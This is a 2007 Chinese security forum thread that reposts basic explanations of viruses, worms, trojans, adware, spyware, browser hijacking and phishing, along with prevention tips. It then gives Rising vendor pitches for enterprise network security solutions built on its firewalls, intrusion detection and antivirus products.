　　“三防” 就是防邮件病毒，用户收到邮件时首先要进行病毒扫描，不要随意打开电子邮件里携带的附件；防木马病毒，木马病毒一般是通过恶意网站散播，用户从网上下载任何文件后，一定要先进行病毒扫描再运行；防恶意“好友”，现在很多木马病毒可以通过 MSN、 QQ等即时通信软件或电子邮件传播，一旦你的在线好友感染病毒，那么所有好友将会遭到病毒的入侵。

jlz10 - 2007-3-31 17:58:00

什么是计算机病毒

　　
　　《中华人民共和国计算机信息系统安全保护条例》中被明确定义，病毒“指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。

　　计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。

　　除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。例如，某些病毒会大量释放垃圾文件，占用硬盘资源。还有的病毒会运行多个进程，使中毒电脑运行变得非常慢。

　　可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散 ,能“传染” 其他程序的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为制造的程序 ,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时 ,它会自生复制并传播 ,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念 ,计算机病毒同生物病毒所相似之处是能够侵入计算机系统和网络 ,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏 ,同时能够自我复制 , 具有传染性。

　　所以 , 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里 , 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令集合。

jlz10 - 2007-3-31 17:59:00

什么是蠕虫病毒，如何防护？

什么是蠕虫病毒，如何防护？
　　蠕虫病毒（Worm）是计算机病毒的一种，通过网络传播，目前主要的传播途径有电子邮件、系统漏洞、聊天软件等。蠕虫病毒是传播最快的病毒种类之一，传播速度最快的蠕虫可以在几分钟之内传遍全球，2003年的“冲击波”病毒、2004年的“震荡波”病毒、2005年上半年的“性感烤鸡”病毒都属于蠕虫病毒。

　　目前危害比较大的蠕虫病毒主要通过三种途径传播：系统漏洞、聊天软件和电子邮件。

　　其中利用系统漏洞传播的病毒往往传播速度极快，如利用微软04-011漏洞的“震荡波”病毒，三天之内就感染了全球至少 50 万台计算机。

　　防止系统漏洞类蠕虫病毒的侵害，最好的办法是打好相应的系统补丁，可以应用瑞星杀毒软件的“漏洞扫描”工具，这款工具可以引导用户打好补丁并进行相应的安全设置，彻底杜绝病毒的感染。

　　通过电子邮件传播，是近年来病毒作者青睐的方式之一，像“恶鹰”、“网络天空”等都是危害巨大的邮件蠕虫病毒。这样的病毒往往会频繁大量的出现变种，用户中毒后往往会造成数据丢失、个人信息失窃、系统运行变慢等。

　　防范邮件蠕虫的最好办法，就是提高自己的安全意识，不要轻易打开带有附件的电子邮件。另外，启用瑞星杀毒软件的“邮件发送监控”和“邮件接收监控”功能，也可以提高自己对病毒邮件的防护能力。

　　从2004年起，MSN 、QQ等聊天软件开始成为蠕虫病毒传播的途径之一。“性感烤鸡”病毒就通过MSN软件传播，在很短时间内席卷全球，一度造成中国大陆地区部分网络运行异常。

　　对于普通用户来讲，防范聊天蠕虫的主要措施之一，就是提高安全防范意识，对于通过聊天软件发送的任何文件，都要经过好友确认后再运行；不要随意点击聊天软件发送的网络链接。

　　随着网络和病毒编写技术的发展，综合利用多种途径的蠕虫也越来越多，比如有的蠕虫病毒就是通过电子邮件传播，同时利用系统漏洞侵入用户系统。还有的病毒会同时通过邮件、聊天软件等多种渠道传播。

　　专家提醒用户，在使用瑞星杀毒软件单机版、瑞星杀毒软件下载版的时候，一定要打开它们的八大监控，这样就可以较好的防范蠕虫病毒的攻击。

jlz10 - 2007-3-31 17:59:00

什么是木马，如何防治？
　　木马（Trojan）这个名字来源于古希腊传说，它是指通过一段特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是客户端，即控制端，另一个是服务端，即被控制端。木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加口令，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等。

　　随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。

　　防治木马的危害，应该采取以下措施：

第一，安装杀毒软件和个人防火墙，并及时升级。

第二，把个人防火墙设置好安全等级，防止未知程序向外传送数据。

第三，可以考虑使用安全性比较好的浏览器和电子邮件客户端工具。

第四，如果使用IE浏览器，应该安装卡卡安全助手，防止恶意网站在自己电脑上安装不明软件和浏览器插件，以免被木马趁机侵入。

jlz10 - 2007-3-31 18:01:00

什么是恶意脚本？

什么是恶意脚本？
　　恶意脚本是指一切以制造危害或者损害系统功能为目的而从软件系统中增加、改变或删除的任何脚本。传统的恶意脚本包括：病毒，蠕虫，特洛伊木马，和攻击性脚本。更新的例子包括： Java攻击小程序（Java attack applets）和危险的ActiveX控件。

防治恶意脚本，应该采取以下措施：

第一，上网时开启瑞星杀毒软件的八大监控。

第二，不要轻易浏览不良网站。

第三，如果怀疑自己感染了恶意脚本，可以登陆瑞星免费查毒网站，对自己的电脑进行全面扫描。

jlz10 - 2007-3-31 18:02:00

什么是广告软件？

什么是广告软件？
　　广告软件（Adware）是指未经用户允许，下载并安装或与其他软件捆绑通过弹出式广告或以其他形式进行商业广告宣传的程序。安装广告软件之后，往往造成系统运行缓慢或系统异常。

防治广告软件，应注意以下方面：

第一，不要轻易安装共享软件或"免费软件"，这些软件里往往含有广告程序、间谍软件等不良软件，可能带来安全风险。

第二，有些广告软件通过恶意网站安装，所以，不要浏览不良网站。

第三，采用安全性比较好的网络浏览器，并注意弥补系统漏洞。

jlz10 - 2007-3-31 18:02:00

什么是间谍软件？

什么是间谍软件？
　　间谍软件（Spyware）是能够在使用者不知情的情况下，在用户电脑上安装后门程序的软件。用户的隐私数据和重要信息会被那些后门程序捕获，甚至这些 “后门程序” 还能使黑客远程操纵用户的电脑。

防治间谍软件，应注意以下方面：

第一，不要轻易安装共享软件或“免费软件”，这些软件里往往含有广告程序、间谍软件等不良软件，可能带来安全风险。

第二，有些间谍软件通过恶意网站安装，所以，不要浏览不良网站。

第三，采用安全性比较好的网络浏览器，并注意弥补系统漏洞。

jlz10 - 2007-3-31 18:03:00

什么是恶意共享软件？

什么是恶意共享软件？
　　恶意共享软件（malicious shareware）是指采用不正当的捆绑或不透明的方式强制安装在用户的计算机上，并且利用一些病毒常用的技术手段造成软件很难被卸载，或采用一些非法手段强制用户购买的免费、共享软件。

安装共享软件时，应注意以下方面：

注意仔细阅读软件提供的“安装协议”，不要随便点“next”进行安装。
不要安装从不良渠道获得的盗版软件，这些软件往往由于破解不完全，安装之后带来安全风险。
使用具有破坏性功能的软件，如硬盘整理、分区软件等，一定要仔细了解它的功能之后再使用，避免因误操作产生不可挽回的损失。

jlz10 - 2007-3-31 18:03:00

什么是浏览器劫持？

什么是浏览器劫持？
　　浏览器劫持是一种恶意程序，通过DLL插件、BHO 、Winsock LSP 等形式对用户的浏览器进行篡改，使用户浏览器出现访问正常网站时被转向到恶意网页、IE浏览器主页 / 搜索页等被修改为劫持软件指定的网站地址等异常。
浏览器劫持如何防止，被劫持之后应采取什么措施？
　　浏览器劫持分为多种不同的方式，从最简单的修改IE默认搜索页到最复杂的通过病毒修改系统设置并设置病毒守护进程，劫持浏览器，都有人采用。针对这些情况，用户应该采取如下措施：

不要轻易浏览不良网站。
不要轻易安装共享软件、盗版软件。
建议使用安全性能比较高的浏览器，并可以针对自己的需要对浏览器的安全设置进行相应调整。
如果给浏览器安装插件，尽量从浏览器提供商的官方网站下载。
如果浏览器被劫持，可以先用瑞星杀毒软件、瑞星杀毒软件下载版或瑞星在线杀毒服务对电脑进行彻底杀毒，再使用卡卡安全助手的“系统修复”功能，就可以使系统恢复正常。

jlz10 - 2007-3-31 18:03:00

么是网络钓鱼？

什么是网络钓鱼？
　　网络钓鱼（Phishing）攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动，受骗者往往会泄露自己的私人资料，如信用卡号、银行卡账户、身份证号等内容。诈骗者通常会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌，骗取用户的私人信息。
如何防备网络钓鱼？

不要在网上留下可以证明自己身份的任何资料，包括手机号码、身份证号、银行卡号码等。
不要把自己的隐私资料通过网络传输，包括银行卡号码、身份证号、电子商务网站账户等资料不要通过QQ 、MSN 、Email 等软件传播，这些途径往往可能被黑客利用来进行诈骗。
不要相信网上流传的消息，除非得到权威途径的证明。如网络论坛、新闻组、 QQ 等往往有人发布谣言，伺机窃取用户的身份资料等。
不要在网站注册时透露自己的真实资料。例如住址、住宅电话、手机号码、自己使用的银行账户、自己经常去的消费场所等。骗子们可能利用这些资料去欺骗你的朋友。
如果涉及到金钱交易、商业合同、工作安排等重大事项，不要仅仅通过网络完成，有心计的骗子们可能通过这些途径了解用户的资料，伺机进行诈骗。
不要轻易相信通过电子邮件、网络论坛等发布的中奖信息、促销信息等，除非得到另外途径的证明。正规公司一般不会通过电子邮件给用户发送中奖信息和促销信息，而骗子们往往喜欢这样进行诈骗。

jlz10 - 2007-3-31 18:05:00

大型企业网络安全整体解决方案

1．需求分析

　　企业不断发展的同时其网络规模也在不断扩大，大型企业由于其自身业务的需要，在不同的地区建有分公司或分支机构，本地庞大的Intranet和分布在全国各地的Intranet之间互相连接形成一个更加庞大的网络。这样一个网网相连的企业网为企业提高了效率、增加企业竞争力，同样，这样复杂的网络面临更多的安全问题。首先本地网络的安全需要保证，同时总部与分支机构、分支机构之间的机密信息传输问题，以及集团的设备管理问题，这样的网络使用环境一般存在下列安全隐患和需求：

计算机病毒在企业内部网络传播
内部网络可能被外部黑客攻击
对外的服务器（如：www、ftp、邮件服务器等）没有安全防护，容易被黑客攻击
内部某些重要的服务器或网络被非法访问，造成信息泄密
内部网络用户上网行为没有进行有效地监控管理，影响日常工作效率，容易形成内部网络的安全隐患
分支机构网络安全问题
大量的垃圾邮件占用网络和系统资源，影响正常的工作
分支机构网络和总部网络连接和数据交换的安全问题
远程、移动用户对公司内部网络的安全访问
2 ．瑞星整体解决方案

　　瑞星针对大型企业的上述特点，利用瑞星公司的系列安全产品为企业量身定制一种安全高效的网络安全整体解决方案。

瑞星防毒墙是一款多功能、高性能的产品，它不但能够在网络边缘病毒检测、拦截和清除的功能，同时，它还是一个高性能的防火墙，通过在总部、分支机构网络边缘分别布置不同性能的防毒墙保护总部和分支机构内部网络和对外服务器不受黑客的攻击，同时通过 VPN功能，为分支机构、远程、移动用户提供一个安全的远程连接功能，是大型企业网络边缘安全的首选产品。
瑞星多功能NP防火墙RFW-SME是一款多功能、高性能、低价位的产品，通过在分支机构或内部网络间布置 RFW-SME，实现对分支机构和内部网络的保护。
瑞星入侵检测系统 RIDS-100是由瑞星公司自主研发的新一代网络安全产品，它集网络监控、入侵检测、实时报警和主动防御功能于一身。实时捕获内外网之间传输的所有数据，利用内置的攻击特征库使用模式匹配和智能分析的方法检测网络上发生的入侵行为和异常现象并实时报警，为计算机网络提供全方位的保护，能最大限度地满足政府、企事业单位保护信息安全的需要。
瑞星网络监控RNM-100是一款对企业网络内部用户上网行为进行监控、记录的一个网络行为管理产品，它可以帮助企业管理者规范企业内部用户的上网行为，提高工作效率，同时避免产生安全隐患。
瑞星杀毒软件网络版是瑞星自主开发的企业网络防病毒软件，通过“集中管理、分布处理”在中小企业内部的服务器和客户端同时部署杀毒软件共同完成对整个网络的病毒防护工作，为用户的网络系统提供全方位防病毒解决方案。
　　通过瑞星防毒墙、RFW-SME 、RIDS-100 、RNM-100和瑞星杀毒软件网络版共同为大型企业建立一个统一的防黑、防毒的安全网络。设计后的安全网络拓扑图如下：

3 ．瑞星整体解决方案实现的主要功能

集成的多重安全功能
　　不仅提供了通用防火墙的所有功能，还集成了主动入侵检测、VPN 、网关防毒、网络防毒等功能，多个安全产品同时工作，起到多重安全保护的功能。

远程、移动用户安全连接内部网络
　　瑞星防毒墙和防火墙都提供虚拟专网功能，实现远程安全办公。

入侵攻击行为的发现和阻断
　　瑞星入侵检测系统RIDS-100能够实时捕获内外网之间传输的所有数据，实时发现来自于网络内部和外部的非法攻击行为，并实时报警。

内部网络行为监控和规范
　　瑞星网络监控RNM-100通过对网络内部网络行为的监控可以规范网络内部的上网行为，提高工作效率，避免企业内部产生网络安全隐患。

计算机病毒的监控和清除
　　瑞星杀毒软件网络版是专门针对网络病毒传播特点开发的网络防病毒软件，可以实现防病毒体系的统一、集中管理，实时掌握、了解当前网络内计算机病毒事件，并实现对网络内的所有计算机远程反病毒策略进行设置和安全操作。

灵活的控制台和Web管理方式
　　瑞星的系列安全产品提供控制台管理和 Web 管理两种方式，通过这两种管理方式管理员可以灵活、简便地根据自身实际情况设置、修改安全策略，及时了解掌握网络当前运行的基本信息。

强大的日志分析和统计报表能力
　　瑞星的系列安全产品对网络内的安全事件均能作出详细的日志记录。此外，报表系统可以自动生成各种形式的攻击统计报表，以直观、清晰的方式从总体上分析网络上发生的各种安全事件。

模块化的安全组合
　　本方案中使用的瑞星网络安全产品分别具有不同的功能，用户可以根据自身企业的实际情况选择不同的产品构建不同安全级别的网络。

安全产品的联动保护
　　瑞星的入侵检测系统RIDS-100可以和瑞星防火墙实现联动一体的保护，当其检测到网络存在黑客攻击行为后，通过与防火墙联动将攻击源通知防火墙并由防火墙阻止攻击源对内部网络进行攻击。

集中统一的管理
　　瑞星网络安全产品提供集中统一的管理功能，管理员可以集中统一管理网络内的任何设备，简化了管理员的工作，并保证了网络安全策略实施的统一性、安全性。

双机热备
　　通过两台防毒墙双机热备保证内部网络不会因为设备故障造成网络连接中断。

jlz10 - 2007-3-31 18:05:00

中、小企业网络安全整体解决方案

1. 安全需求分析

　　中小企业用户的局域网一般来说网络结构不太复杂，主机数量不太多，服务器提供的服务相对较少。这样的网络通常很少甚至没有专门的管理员来维护网络的安全，这就给黑客和非法访问提供了可乘之机。这样的网络使用环境一般存在下列安全隐患和需求：

计算机病毒在企业内部网络传播
内部网络可能被外部黑客攻击
对外的服务器（如：www、ftp等）没有安全防护，容易被黑客攻击
内部网络用户上网行为没有得到有效地监控管理，影响日常工作效率，容易形成内部网络的安全隐患
远程、移动用户对公司内部网络的安全访问
2 ．瑞星整体解决方案

　　瑞星公司针对中小企业的上述特点，利用瑞星公司的系列安全产品为中小企业量身定制一套安全高效的网络安全解决方案。

瑞星多功能NP防火墙RFW-SME是一款多功能、高性能、低价位的产品，它不但提供了对内部网络和对外服务器的保护、防止黑客对这些网络进行攻击，同时支持 VPN功能，为远程、移动用户提供一个安全的远程连接功能，是中小企业网络安全的首选产品。
瑞星网络监控RNM-100是一款对企业网络内部用户上网行为进行监控、记录的一个网络行为管理产品，它可以帮助企业管理者实现对内部用户的上网行为进行监控、记录，规范企业内部用户的上网行为，提高工作效率，同时避免产生网络安全隐患。
瑞星杀毒软件网络版是瑞星自主开发的企业网络防病毒软件，通过“集中管理、分布处理”在中小企业内部的服务器和客户端同时部署杀毒软件共同完成对整个网络的病毒防护工作，为用户的网络系统提供全方位防病毒解决方案。
　　通过瑞星RFW-SME、RNM-100和瑞星杀毒软件网络版共同为中小企业建立一个防黑、防毒的安全网络。设计后的安全网络拓扑图如下：

3 ．瑞星整体解决方案实现主要功能

集成的多重安全功能
　　瑞星中小企业安全解决方案集成了多重的网络安全功能，不仅提供了通用防火墙的所有功能，还集成了主动式的入侵检测、VPN 、网络防病毒等功能，多个安全产品同时工作，起到多重安全保护的功能。

远程、移动用户安全连接内部网络
　　瑞星多功能NP防火墙RFW-SME提供虚拟专网功能，通过VPN功能远程、移动用户可以安全地通过Internet连接到企业内部网络，实现远程安全办公。

内部网络行为监控和规范
　　瑞星网络监控RNM-100对HTTP、 SMTP、 POP3和基于HTTP协议的其他应用协议具有 100%的记录能力 ,企业内部用户上网信息识别粒度达到每一个URL请求和每一个 URL请求的回应。瑞星网络监控RNM-100自动总结对每一个 URL请求的反馈，尤其针对下载等数据回馈量较大的 Internet请求，通过对网络内部网络行为的监控可以规范网络内部的上网行为，提高工作效率，同时避免企业内部产生网络安全隐患。

计算机病毒的监控和清除
　　瑞星杀毒软件网络版是一个专门针对网络病毒传播特点开发的网络防病毒软件，通过瑞星网络防病毒体系在网络内客户端和服务器上建立反病毒系统，并且可以实现防病毒体系的统一、集中管理，实时掌握、了解当前网络内计算机病毒事件，并实现对网络内的所有计算机远程反病毒策略进行设置和安全操作。

灵活的控制台和 Web 管理方式
　　瑞星的系列安全产品均提供控制台管理和 Web 管理两种方式，通过这两种管理方式管理员可以灵活、简便地根据自身实际情况设置、修改安全策略，及时掌握了解网络当前的运行基本信息。

强大的日志分析和统计报表能力
　　瑞星的系列安全产品对网络内的安全事件均能作出详细的日志记录，这些日志记录包括事件名称、描述和相应的主机 IP地址等相关信息。此外，报表系统可以自动生成各种形式的攻击统计报表，形式包括日报表、月报表、年报表等，通过来源分析、目标分析、类别分析等多种分析方式，以直观、清晰的方式从总体上分析网络上发生的各种事件，有助于管理人员提高网络的安全管理。

模块化的安全组合
　　本方案中使用的瑞星网络安全产品分别具有不同的功能，用户可以根据自身企业的实际情选择不同的产品构建不同安全级别的网络，产品选择方便、组合灵活，既有独立性又有整体性。

jlz10 - 2007-3-31 18:06:00

企业网络安全整体解决方案

1 ．安全需求分析

　　企业用户为了提高办公效率、提高企业的竞争力，创造内部人员之间沟通的崭新人文环境，纷纷建立了自己的内部局域网（Intranet），同时，更快获取市场信息、对外宣传自己的产品，大多数企业都选择接入 Internet 这个见效快、投资小的方式。在企业用户通过网络来提高自身竞争力的同时，信息安全问题也随之而来。如企业敏感信息的泄露、黑客的侵扰、内部网络资源的非法访问和使用以及计算机病毒等，都将对企业的信息安全构成严重的威胁。这样的网络使用环境一般存在下列安全隐患和需求：

计算机病毒在企业内部网络传播
内部网络可能被外部黑客攻击
对外的服务器（如：www、ftp、邮件服务器等）没有安全防护，容易被黑客攻击
内部某些重要的服务器或网络被内部用户非法访问，造成信息泄密
内部网络用户上网行为没有有效监控管理，影响日常工作效率，容易形成内部网络的安全隐患
大量的垃圾邮件占用网络和系统资源，影响正常的工作
远程、移动用户对公司内部网络的安全访问
2 ．瑞星整体解决方案

　　瑞星针对企业的上述特点，利用瑞星公司的系列安全产品为企业量身定制一种安全高效的网络安全解决方案。

瑞星RFW-100＋防火墙是一款多功能、高性能的防火墙，它不但提供了对内部网络和对外服务器的保护、防止黑客对这些网络的攻击，同时支持 VPN功能，为远程、移动用户提供一个安全的远程连接功能，是企业网络安全的首选。
瑞星入侵检测系统 RIDS-100 是由瑞星公司自主研发的新一代网络安全产品，它集网络监控、入侵检测、实时报警和主动防御功能于一身。实时捕获内外网之间传输的所有数据利用内置的攻击特征库使用模式匹配和智能分析的方法检测网络上发生的入侵行为和异常现象，并实时报警，为计算机网络提供全方位的保护，能最大限度地满足政府、企事业单位保护信息安全的需要。
瑞星网络监控 RNM-100是一款对企业网络内部用户上网行为进行监控、记录的一个网络行为管理产品，它可以帮助企业管理者规范企业内部用户的上网行为，提高工作效率，同时避免产生安全隐患。
瑞星杀毒软件网络版是瑞星自主开发的企业网络防病毒软件，通过“集中管理、分布处理”在中小企业内部的服务器和客户端同时部署杀毒软件共同完成对整个网络的病毒防护工作，为用户的网络系统提供全方位防病毒解决方案。
　　通过瑞星RFW-100＋、RIDS-100 、RNM-100和瑞星杀毒软件网络版共同为企业建立一个防黑、防毒的安全网络。设计后的安全网络拓扑图如下：

3 ．瑞星整体解决方案实现的主要功能

集成的多重安全功能
　　瑞星企业网络安全整体解决方案集成了多重的网络安全功能，不仅提供了通用防火墙的所有功能，还集成了主动入侵检测、VPN 、网关防毒、网络防毒等功能，多个安全产品同时工作，起到多重安全保护的功能。

远程、移动用户安全连接内部网络
　　瑞星高性能防火墙 RFW-100 ＋提供虚拟专网功能，通过 VPN 功能，远程、移动用户可以安全地通过 Internet 连接到企业内部网络，实现远程安全办公。

入侵攻击行为的发现和阻断
　　瑞星入侵检测系统RIDS-100能够实时捕获内外网之间传输的所有数据，实时发现来自于网络内部和外部的非法攻击行为，并实时报警。

内部网络行为监控和规范
　　瑞星网络监控RNM-100通过对网络内部网络行为的监控可以规范网络内部的上网行为，提高工作效率，避免企业内部产生网络安全隐患。

计算机病毒的监控和清除
　　瑞星杀毒软件网络版是专门针对网络病毒传播特点开发的网络防病毒软件，可以实现防病毒体系的统一、集中管理，实时掌握、了解当前网络内计算机病毒事件，并实现对网络内的所有计算机远程反病毒策略进行设置和安全操作。

灵活的控制台和 Web 管理方式
　　瑞星的系列安全产品提供控制台管理和Web管理两种方式，通过这两种管理方式管理员可以灵活、简便地根据自身实际情况设置、修改安全策略，及时了解掌握网络当前运行的基本信息。

强大的日志分析和统计报表能力
　　瑞星的系列安全产品对网络内的安全事件都作出详细的日志记录。此外，报表系统可以自动生成各种形式的攻击统计报表，以直观、清晰的方式从总体上分析网络上发生的各种安全事件。

模块化的安全组合
　　本方案中使用的瑞星网络安全产品分别具有不同的功能，用户可以根据自身企业的实际情况选择不同的产品构建不同安全级别的网络。

安全产品的联动保护
　　瑞星的入侵检测系统RIDS-100可以和瑞星防火墙实现联动一体的保护，当其检测到网络存在黑客攻击行为后，通过与防火墙联动将攻击源通知防火墙并由防火墙阻止攻击源对内部网络进行。

瑞星卡卡安全论坛